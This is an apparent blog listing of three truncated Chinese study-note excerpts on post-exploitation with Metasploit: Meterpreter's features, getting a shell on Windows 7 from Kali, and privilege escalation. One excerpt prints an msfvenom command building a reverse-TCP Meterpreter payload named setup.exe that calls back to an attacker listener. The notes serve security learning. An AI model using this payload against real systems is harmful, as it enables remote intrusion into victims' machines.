后渗透攻击
家住海边就爱浪吖
这个作者很懒,什么都没留下…
展开
-
Web安全攻防-----学习笔记(五)之后渗透攻击:信息渗透
5.5 后渗透攻击:信息收集Metasploit提供了一个非常强大的后渗透工具------Meterpreter,该工具具有多重功能,后期渗透模块有200多个,Meterpreter有以下优势。纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,而且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用,适用于Windows、Li...原创 2019-09-13 21:31:48 · 2215 阅读 · 1 评论 -
Kali利用MSF渗透Win 7获取shell
首先在kali上制作一个后门程序,文件名为:setup.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe#本地监听地址及端口号:192.168.1.100:5050为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执...原创 2019-09-13 23:33:01 · 3397 阅读 · 0 评论 -
Web安全攻防-----学习笔记(五)之后渗透攻击:权限提升
5.6 后渗透攻击:权限提升通常获取的权限为Guest或User权限,必须将访问权限从Guest提升到User,再到Administrator,最后到System级别。提升权限的方式有两种:纵向提权:低权限角色获得高权限角色的权限 横向提权:获取同级别角色的权限输入shell进入目标机的cmd命令行,利用命令查看我们当前的权限:whoami /groups说明当前是一个标...原创 2019-09-14 11:14:30 · 927 阅读 · 0 评论